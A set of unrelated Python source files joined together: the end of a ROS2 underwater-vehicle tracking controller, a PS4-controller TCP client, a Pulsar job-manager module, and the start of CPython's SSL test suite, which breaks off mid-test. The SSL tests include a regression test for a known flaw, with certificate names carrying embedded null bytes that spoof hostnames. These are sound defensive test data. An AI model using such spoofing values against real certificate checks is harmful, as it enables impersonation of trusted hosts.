# Publish error (for debugging)
self.error_pub = self.create_publisher(
TrajectoryPoint, 'error', 1)
self._ready = True
self.get_logger().info('AUV geometric tracking controller: ready')
self.init_future.set_result(True)
#==========================================================================
@property
def ready(self):
return self._ready
#==========================================================================
@staticmethod
def unwrap_angle(t):
return math.atan2(math.sin(t),math.cos(t))
#==========================================================================
@staticmethod
def vector_to_np(v):
return np.array([v.x, v.y, v.z])
#==========================================================================
@staticmethod
def quaternion_to_np(q):
return np.array([q.x, q.y, q.z, q.w])
#==========================================================================
def odometry_callback(self, msg):
"""Handle odometry callback: The actual control loop."""
# Update local planner's vehicle position and orientation
pos = [msg.pose.pose.position.x,
msg.pose.pose.position.y,
msg.pose.pose.position.z]
quat = [msg.pose.pose.orientation.x,
msg.pose.pose.orientation.y,
msg.pose.pose.orientation.z,
msg.pose.pose.orientation.w]
self.local_planner.update_vehicle_pose(pos, quat)
# Compute the desired position
t = time_in_float_sec(self.get_clock().now())
des = self.local_planner.interpolate(t)
# Publish the reference
ref_msg = TrajectoryPoint()
ref_msg.header.stamp = self.get_clock().now().to_msg()
ref_msg.header.frame_id = self.local_planner.inertial_frame_id
ref_msg.pose.position = geometry_msgs.Point(**self.to_dict_vect3(*des.p))
ref_msg.pose.orientation = geometry_msgs.Quaternion(**self.to_dict_quat(*des.q))
ref_msg.velocity.linear = geometry_msgs.Vector3(**self.to_dict_vect3(*des.vel[0:3]))
ref_msg.velocity.angular = geometry_msgs.Vector3(**self.to_dict_vect3(*des.vel[3::]))
self.reference_pub.publish(ref_msg)
p = self.vector_to_np(msg.pose.pose.position)
forward_vel = self.vector_to_np(msg.twist.twist.linear)
ref_vel = des.vel[0:3]
q = self.quaternion_to_np(msg.pose.pose.orientation)
rpy = euler_from_quaternion(q, axes='sxyz')
# Compute tracking errors wrt world frame:
e_p = des.p - p
abs_pos_error = np.linalg.norm(e_p)
abs_vel_error = np.linalg.norm(ref_vel - forward_vel)
# Generate error message
error_msg = TrajectoryPoint()
error_msg.header.stamp = self.get_clock().now().to_msg()
error_msg.header.frame_id = self.local_planner.inertial_frame_id
error_msg.pose.position = geometry_msgs.Point(**self.to_dict_vect3(*e_p))
error_msg.pose.orientation = geometry_msgs.Quaternion(
**self.to_dict_quat(*quaternion_multiply(quaternion_inverse(q), des.q)))
error_msg.velocity.linear = geometry_msgs.Vector3(
**self.to_dict_vect3(*(des.vel[0:3] - self.vector_to_np(msg.twist.twist.linear))))
error_msg.velocity.angular = geometry_msgs.Vector3(
**self.to_dict_vect3(*(des.vel[3::] - self.vector_to_np(msg.twist.twist.angular))))
# Based on position tracking error: Compute desired orientation
pitch_des = -math.atan2(e_p[2], np.linalg.norm(e_p[0:2]))
# Limit desired pitch angle:
pitch_des = max(-self.desired_pitch_limit, min(pitch_des, self.desired_pitch_limit))
yaw_des = math.atan2(e_p[1], e_p[0])
yaw_err = self.unwrap_angle(yaw_des - rpy[2])
# Limit yaw effort
yaw_err = min(self.yaw_error_limit, max(-self.yaw_error_limit, yaw_err))
# Roll: P controller to keep roll == 0
roll_control = self.p_roll * rpy[0]
# Pitch: P controller to reach desired pitch angle
pitch_control = self.p_pitch * self.unwrap_angle(pitch_des - rpy[1]) + self.d_pitch * (des.vel[4] - msg.twist.twist.angular.y)
# Yaw: P controller to reach desired yaw angle
yaw_control = self.p_yaw * yaw_err + self.d_yaw * (des.vel[5] - msg.twist.twist.angular.z)
# Limit thrust
thrust = min(self.max_thrust, self.p_gain_thrust * np.linalg.norm(abs_pos_error) + self.d_gain_thrust * abs_vel_error)
thrust = max(self.min_thrust, thrust)
rpy = np.array([roll_control, pitch_control, yaw_control])
# In case the world_ned reference frame is used, the convert it back
# to the ENU convention to generate the reference fin angles
rtf = deepcopy(self.rpy_to_fins)
if self.local_planner.inertial_frame_id == 'world_ned':
rtf[:, 1] *= -1
rtf[:, 2] *= -1
# Transform orientation command into fin angle set points
fins = rtf.dot(rpy)
# Check for saturation
max_angle = max(np.abs(fins))
if max_angle >= self.max_fin_angle:
fins = fins * self.max_fin_angle / max_angle
thrust_force = self.thruster.tam_column * thrust
self.thruster.publish_command(thrust_force[0])
cmd = FloatStamped()
for i in range(self.n_fins):
cmd.header.stamp = self.get_clock().now().to_msg()
cmd.header.frame_id = '%s/fin%d' % (self.namespace, i)
cmd.data = min(fins[i], self.max_fin_angle)
cmd.data = max(cmd.data, -self.max_fin_angle)
self.pub_cmd[i].publish(cmd)
self.error_pub.publish(error_msg)
#==========================================================================
def get_parameter_or_helper(self, name, default_value):
return get_parameter_or_helper(self, name, default_value)
# =========================================================================
def build_thruster_topic_name(self, namespace, topic_prefix, id, topic_suffix) -> str:
return '/%s/%s/id_%d/%s' % (namespace, topic_prefix, id, topic_suffix)
# =========================================================================
def build_fin_topic_name(self, topic_prefix, id, topic_suffix) -> str:
return '%s/id_%d/%s' % (topic_prefix, id, topic_suffix)
# =========================================================================
def to_dict_vect3(self, *args) -> dict:
return { 'x': args[0], 'y': args[1], 'z': args[2] }
# =========================================================================
def to_dict_quat(self, *args) -> dict:
return { 'x': args[0], 'y': args[1], 'z': args[2], 'w': args[3] }
#==============================================================================
def main():
print('Starting AUV trajectory tracker')
rclpy.init()
try:
sim_time_param = is_sim_time()
tf_world_ned_to_enu = get_world_ned_to_enu(sim_time_param)
node = AUVGeometricTrackingController(
'auv_geometric_tracking_controller',
world_ned_to_enu=tf_world_ned_to_enu,
parameter_overrides=[sim_time_param])
rclpy.spin(node)
except Exception as e:
print('caught exception: ' + repr(e))
traceback.print_exc()
finally:
if rclpy.ok():
rclpy.shutdown()
#==============================================================================
if __name__ == '__main__':
main()
|
controller_client.py
|
####################################################################
# Ruben Cardenes, Clay L. McLeod -- Feb 2020
#
# File: controller_client.py
#
# Description: This script has to be executed on the computer connected to a
# Playstation 4 Controller by USB. No driver installation needed,
# simply plug your PS4 controller into your computer using USB
# This script was modified to send packets to another device (like
# Raspberry PI) accepting the PS4 controls to do something
#
# NOTE: We assume in this script that the only joystick plugged in is the PS4 controller.
# if this is not the case, you will need to change the class accordingly.
#
# NOTE: Tested on Linux and MacOS
#
# This is a modification from a script by Clay L. McLeod <clay.l.mcleod@gmail.com>
# Distributed under terms of the MIT license.
####################################################################
import os
import pprint
import pygame
import socket
import pickle
import sys
from threading import Thread
HEADERSIZE = 10
class PS4Controller(object):
"""Class representing the PS4 controller"""
controller = None
axis_data = None
button_data = None
hat_data = None
def init(self, address, port):
"""Initialize the joystick components"""
pygame.init()
pygame.joystick.init()
self.controller = pygame.joystick.Joystick(0)
self.controller.init()
self.event_dict = {}
# Create a TCP/IP socket
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (address, port)
print('connecting to {} port {}'.format(address, port))
self.sock.connect(server_address)
self.axis_data = {i:0 for i in range(7)}
self.verbose = True
def listen_and_send(self):
"""Listen for events to happen and send commands"""
hadEvent = False
if not self.axis_data:
self.axis_data = {}
if not self.button_data:
self.button_data = {}
for i in range(self.controller.get_numbuttons()):
self.button_data[i] = False
if not self.hat_data:
self.hat_data = {}
for i in range(self.controller.get_numhats()):
self.hat_data[i] = (0, 0)
while True:
for event in pygame.event.get():
if event.type == pygame.JOYAXISMOTION:
self.axis_data[event.axis] = round(event.value, 2)
elif event.type == pygame.JOYBUTTONDOWN:
self.button_data[event.button] = True
elif event.type == pygame.JOYBUTTONUP:
self.button_data[event.button] = False
elif event.type == pygame.JOYHATMOTION:
self.hat_data[event.hat] = event.value
if event.type == pygame.JOYBUTTONDOWN:
# A button on the joystick just got pushed down
hadEvent = True
elif event.type == pygame.JOYAXISMOTION:
# A joystick has been moved
hadEvent = True
if hadEvent:
# If platform is linux we need to change some values in axis_data
os.system('clear')
print("Axis before")
pprint.pprint(self.axis_data)
if sys.platform == 'linux':
#self.axis_data[2], self.axis_data[3], self.axis_data[4] = self.axis_data[4], self.axis_data[2], self.axis_data[3]
temp2 = self.axis_data[2]
temp3 = self.axis_data[3]
temp4 = self.axis_data[4]
self.axis_data[2] = temp4
self.axis_data[3] = temp2
self.axis_data[4] = temp3
self.event_dict['axis'] = self.axis_data
self.event_dict['button'] = self.button_data
message = pickle.dumps(self.event_dict, protocol=4)
message = bytes(f"{len(message):<{HEADERSIZE}}", 'utf-8') + message
self.sock.sendall(message)
#if self.button_data[4]:
# self.verbose = not self.verbose
if self.verbose:
# print("Button ")
# pprint.pprint(self.button_data)
print("Axis ")
pprint.pprint(self.axis_data)
# print("Motion ")
# pprint.pprint(self.hat_data)
if __name__ == "__main__":
ps4 = PS4Controller()
server_hostname = 'localhost'
if len(sys.argv) > 1:
server_hostname = sys.argv[1]
print("Starting connection to ", server_hostname)
ps4.init(server_hostname, 10200)
#t = Thread(target=ps4.listen_and_send(), args=()).start()
#Non-threaded version
ps4.listen_and_send()
|
stateful.py
|
from __future__ import division
import contextlib
import datetime
import os
import time
import threading
try:
# If galaxy-lib or Galaxy 19.05 present.
from galaxy.tools.deps.dependencies import DependenciesDescription
except ImportError:
# If galaxy-tool-util or Galaxy 19.09 present.
from galaxy.tool_util.deps.dependencies import DependenciesDescription
from pulsar.client.util import filter_destination_params
from pulsar.managers import ManagerProxy
from pulsar.managers import status
from pulsar.managers.util.retry import RetryActionExecutor
from .staging import preprocess
from .staging import postprocess
import logging
log = logging.getLogger(__name__)
DEFAULT_DO_MONITOR = False
DECACTIVATE_FAILED_MESSAGE = "Failed to deactivate job with job id %s. May cause problems on next Pulsar start."
ACTIVATE_FAILED_MESSAGE = "Failed to activate job with job id %s. This job may not recover properly upon Pulsar restart."
JOB_FILE_FINAL_STATUS = "final_status"
JOB_FILE_POSTPROCESSED = "postprocessed"
JOB_FILE_PREPROCESSED = "preprocessed"
JOB_FILE_PREPROCESSING_FAILED = "preprocessing_failed"
JOB_METADATA_RUNNING = "running"
ACTIVE_STATUS_PREPROCESSING = "preprocessing"
ACTIVE_STATUS_LAUNCHED = "launched"
DEFAULT_MIN_POLLING_INTERVAL = 0.5
class StatefulManagerProxy(ManagerProxy):
"""
"""
def __init__(self, manager, **manager_options):
super(StatefulManagerProxy, self).__init__(manager)
min_polling_interval = float(manager_options.get("min_polling_interval", DEFAULT_MIN_POLLING_INTERVAL))
preprocess_retry_action_kwds = filter_destination_params(manager_options, "preprocess_action_")
postprocess_retry_action_kwds = filter_destination_params(manager_options, "postprocess_action_")
self.__preprocess_action_executor = RetryActionExecutor(**preprocess_retry_action_kwds)
self.__postprocess_action_executor = RetryActionExecutor(**postprocess_retry_action_kwds)
self.min_polling_interval = datetime.timedelta(0, min_polling_interval)
self.active_jobs = ActiveJobs.from_manager(manager)
self.__state_change_callback = self._default_status_change_callback
self.__monitor = None
def set_state_change_callback(self, state_change_callback):
self.__state_change_callback = state_change_callback
self.__monitor = ManagerMonitor(self)
def _default_status_change_callback(self, status, job_id):
log.info("Status of job [%s] changed to [%s]. No callbacks enabled." % (job_id, status))
@property
def name(self):
return self._proxied_manager.name
def setup_job(self, *args, **kwargs):
job_id = self._proxied_manager.setup_job(*args, **kwargs)
return job_id
def _persist_launch_config(self, job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
job_directory.store_metadata("launch_config", launch_config)
def touch_outputs(self, job_id, touch_outputs):
job_directory = self._proxied_manager.job_directory(job_id)
for name in touch_outputs:
path = job_directory.calculate_path(name, 'output')
job_directory.open_file(path, mode='a')
def preprocess_and_launch(self, job_id, launch_config):
self._persist_launch_config(job_id, launch_config)
requires_preprocessing = launch_config.get("remote_staging") and launch_config["remote_staging"].get("setup")
if requires_preprocessing:
self.active_jobs.activate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)
self._launch_prepreprocessing_thread(job_id, launch_config)
else:
with self._handling_of_preprocessing_state(job_id, launch_config):
pass
def _launch_prepreprocessing_thread(self, job_id, launch_config):
def do_preprocess():
with self._handling_of_preprocessing_state(job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
staging_config = launch_config.get("remote_staging", {})
# TODO: swap out for a generic "job_extra_params"
if 'action_mapper' in staging_config and \
'ssh_key' in staging_config['action_mapper'] and \
'setup' in staging_config:
for action in staging_config['setup']:
action['action'].update(ssh_key=staging_config['action_mapper']['ssh_key'])
setup_config = staging_config.get("setup", [])
preprocess(job_directory, setup_config, self.__preprocess_action_executor, object_store=self.object_store)
self.active_jobs.deactivate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)
new_thread_for_job(self, "preprocess", job_id, do_preprocess, daemon=False)
@contextlib.contextmanager
def _handling_of_preprocessing_state(self, job_id, launch_config):
job_directory = self._proxied_manager.job_directory(job_id)
try:
yield
launch_kwds = {}
if launch_config.get("dependencies_description"):
dependencies_description = DependenciesDescription.from_dict(launch_config["dependencies_description"])
launch_kwds["dependencies_description"] = dependencies_description
for kwd in ["submit_params", "setup_params", "env"]:
if kwd in launch_config:
launch_kwds[kwd] = launch_config[kwd]
self._proxied_manager.launch(
job_id,
launch_config["command_line"],
**launch_kwds
)
with job_directory.lock("status"):
job_directory.store_metadata(JOB_FILE_PREPROCESSED, True)
self.active_jobs.activate_job(job_id)
except Exception as e:
with job_directory.lock("status"):
job_directory.store_metadata(JOB_FILE_PREPROCESSING_FAILED, True)
job_directory.store_metadata("return_code", 1)
job_directory.write_file("stderr", str(e))
self.__state_change_callback(status.FAILED, job_id)
log.exception("Failed job preprocessing for job %s:", job_id)
def handle_failure_before_launch(self, job_id):
self.__state_change_callback(status.FAILED, job_id)
def get_status(self, job_id):
""" Compute status used proxied manager and handle state transitions
and track additional state information needed.
"""
job_directory = self._proxied_manager.job_directory(job_id)
with job_directory.lock("status"):
proxy_status, state_change = self.__proxy_status(job_directory, job_id)
if state_change == "to_complete":
self.__deactivate(job_id, proxy_status)
elif state_change == "to_running":
self.__state_change_callback(status.RUNNING, job_id)
return self.__status(job_directory, proxy_status)
def __proxy_status(self, job_directory, job_id):
""" Determine state with proxied job manager and if this job needs
to be marked as deactivated (this occurs when job first returns a
complete status from proxy.
"""
state_change = None
if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
proxy_status = status.FAILED
job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
state_change = "to_complete"
elif not job_directory.has_metadata(JOB_FILE_PREPROCESSED):
proxy_status = status.PREPROCESSING
elif job_directory.has_metadata(JOB_FILE_FINAL_STATUS):
proxy_status = job_directory.load_metadata(JOB_FILE_FINAL_STATUS)
else:
proxy_status = self._proxied_manager.get_status(job_id)
if proxy_status == status.RUNNING:
if not job_directory.has_metadata(JOB_METADATA_RUNNING):
job_directory.store_metadata(JOB_METADATA_RUNNING, True)
state_change = "to_running"
elif proxy_status in [status.COMPLETE, status.CANCELLED]:
job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
state_change = "to_complete"
return proxy_status, state_change
def __status(self, job_directory, proxy_status):
""" Use proxied manager's status to compute the real
(stateful) status of job.
"""
if proxy_status == status.COMPLETE:
if not job_directory.has_metadata(JOB_FILE_POSTPROCESSED):
job_status = status.POSTPROCESSING
else:
job_status = status.COMPLETE
else:
job_status = proxy_status
return job_status
def __deactivate(self, job_id, proxy_status):
self.active_jobs.deactivate_job(job_id)
deactivate_method = getattr(self._proxied_manager, "_deactivate_job", None)
if deactivate_method:
try:
deactivate_method(job_id)
except Exception:
log.exception("Failed to deactivate via proxied manager job %s" % job_id)
if proxy_status == status.COMPLETE:
self.__handle_postprocessing(job_id)
def __handle_postprocessing(self, job_id):
def do_postprocess():
postprocess_success = False
job_directory = self._proxied_manager.job_directory(job_id)
try:
postprocess_success = postprocess(job_directory, self.__postprocess_action_executor)
except Exception:
log.exception("Failed to postprocess results for job id %s" % job_id)
final_status = status.COMPLETE if postprocess_success else status.FAILED
if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
final_status = status.FAILED
self.__state_change_callback(final_status, job_id)
new_thread_for_job(self, "postprocess", job_id, do_postprocess, daemon=False)
def shutdown(self, timeout=None):
if self.__monitor:
try:
self.__monitor.shutdown(timeout)
except Exception:
log.exception("Failed to shutdown job monitor for manager %s" % self.name)
super(StatefulManagerProxy, self).shutdown(timeout)
def recover_active_jobs(self):
unqueue_preprocessing_ids = []
for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_PREPROCESSING):
job_directory = self._proxied_manager.job_directory(job_id)
if not job_directory.has_metadata("launch_config"):
log.warn("Failed to find launch parameters for job scheduled to prepreprocess [%s]" % job_id)
unqueue_preprocessing_ids.append(job_id)
elif job_directory.has_metadata(JOB_FILE_PREPROCESSED):
log.warn("Job scheduled to prepreprocess [%s] already preprocessed, skipping" % job_id)
unqueue_preprocessing_ids.append(job_id)
elif job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
log.warn("Job scheduled to prepreprocess [%s] previously failed preprocessing, skipping" % job_id)
unqueue_preprocessing_ids.append(job_id)
else:
launch_config = job_directory.load_metadata("launch_config")
self._launch_prepreprocessing_thread(job_id, launch_config)
for unqueue_preprocessing_id in unqueue_preprocessing_ids:
self.active_jobs.deactivate_job(unqueue_preprocessing_id, active_status=ACTIVE_STATUS_PREPROCESSING)
recover_method = getattr(self._proxied_manager, "_recover_active_job", None)
if recover_method is None:
return
for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_LAUNCHED):
try:
recover_method(job_id)
except Exception:
log.exception("Failed to recover active job %s" % job_id)
self.__handle_recovery_problem(job_id)
def __handle_recovery_problem(self, job_id):
# Make sure we tell the client we have lost this job.
self.active_jobs.deactivate_job(job_id)
self.__state_change_callback(status.LOST, job_id)
class ActiveJobs(object):
""" Keeps track of active jobs (those that are not yet "complete").
Current implementation is file based, but could easily be made
database-based instead.
TODO: Keep jobs in memory after initial load so don't need to repeatedly
hit disk to recover this information.
"""
@staticmethod
def from_manager(manager):
persistence_directory = manager.persistence_directory
manager_name = manager.name
return ActiveJobs(manager_name, persistence_directory)
def __init__(self, manager_name, persistence_directory):
if persistence_directory:
active_job_directory = os.path.join(persistence_directory, "%s-active-jobs" % manager_name)
if not os.path.exists(active_job_directory):
os.makedirs(active_job_directory)
preprocessing_job_directory = os.path.join(persistence_directory, "%s-preprocessing-jobs" % manager_name)
if not os.path.exists(preprocessing_job_directory):
os.makedirs(preprocessing_job_directory)
else:
active_job_directory = None
preprocessing_job_directory = None
self.launched_job_directory = active_job_directory
self.preprocessing_job_directory = preprocessing_job_directory
def active_job_ids(self, active_status=ACTIVE_STATUS_LAUNCHED):
job_ids = []
target_directory = self._active_job_directory(active_status)
if target_directory:
job_ids = os.listdir(target_directory)
return job_ids
def activate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
if self._active_job_directory(active_status):
path = self._active_job_file(job_id, active_status=active_status)
try:
open(path, "w").close()
except Exception:
log.warn(ACTIVATE_FAILED_MESSAGE % job_id)
def deactivate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
if self._active_job_directory(active_status):
path = self._active_job_file(job_id, active_status=active_status)
if os.path.exists(path):
try:
os.remove(path)
except Exception:
log.warn(DECACTIVATE_FAILED_MESSAGE % job_id)
def _active_job_directory(self, active_status):
if active_status == ACTIVE_STATUS_LAUNCHED:
target_directory = self.launched_job_directory
elif active_status == ACTIVE_STATUS_PREPROCESSING:
target_directory = self.preprocessing_job_directory
else:
raise Exception("Unknown active state encountered [%s]" % active_status)
return target_directory
def _active_job_file(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
return os.path.join(self._active_job_directory(active_status), job_id)
class ManagerMonitor(object):
""" Monitors active jobs of a StatefulManagerProxy.
"""
def __init__(self, stateful_manager):
self.stateful_manager = stateful_manager
self.active = True
thread = new_thread_for_manager(self.stateful_manager, "[action=monitor]", self._run, True)
self.thread = thread
def shutdown(self, timeout=None):
self.active = False
self.thread.join(timeout)
if self.thread.isAlive():
log.warn("Failed to join monitor thread [%s]" % self.thread)
def _run(self):
""" Main loop, repeatedly checking active jobs of stateful manager.
"""
while self.active:
try:
self._monitor_active_jobs()
except Exception:
log.exception("Failure in stateful manager monitor step.")
def _monitor_active_jobs(self):
active_job_ids = self.stateful_manager.active_jobs.active_job_ids()
iteration_start = datetime.datetime.now()
for active_job_id in active_job_ids:
try:
self._check_active_job_status(active_job_id)
except Exception:
log.exception("Failed checking active job status for job_id %s" % active_job_id)
iteration_end = datetime.datetime.now()
iteration_length = iteration_end - iteration_start
if iteration_length < self.stateful_manager.min_polling_interval:
to_sleep = (self.stateful_manager.min_polling_interval - iteration_length)
microseconds = to_sleep.microseconds + (to_sleep.seconds + to_sleep.days * 24 * 3600) * (10 ** 6)
total_seconds = microseconds / (10 ** 6)
time.sleep(total_seconds)
def _check_active_job_status(self, active_job_id):
# Manager itself will handle state transitions when status changes,
# just need to poll get_status
self.stateful_manager.get_status(active_job_id)
def new_thread_for_job(manager, action, job_id, target, daemon):
name = "[action=%s]-[job=%s]" % (action, job_id)
return new_thread_for_manager(manager, name, target, daemon)
def new_thread_for_manager(manager, name, target, daemon):
thread_name = "[manager=%s]-%s" % (manager.name, name)
thread = threading.Thread(name=thread_name, target=target)
thread.daemon = daemon
thread.start()
return thread
__all__ = ('StatefulManagerProxy',)
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
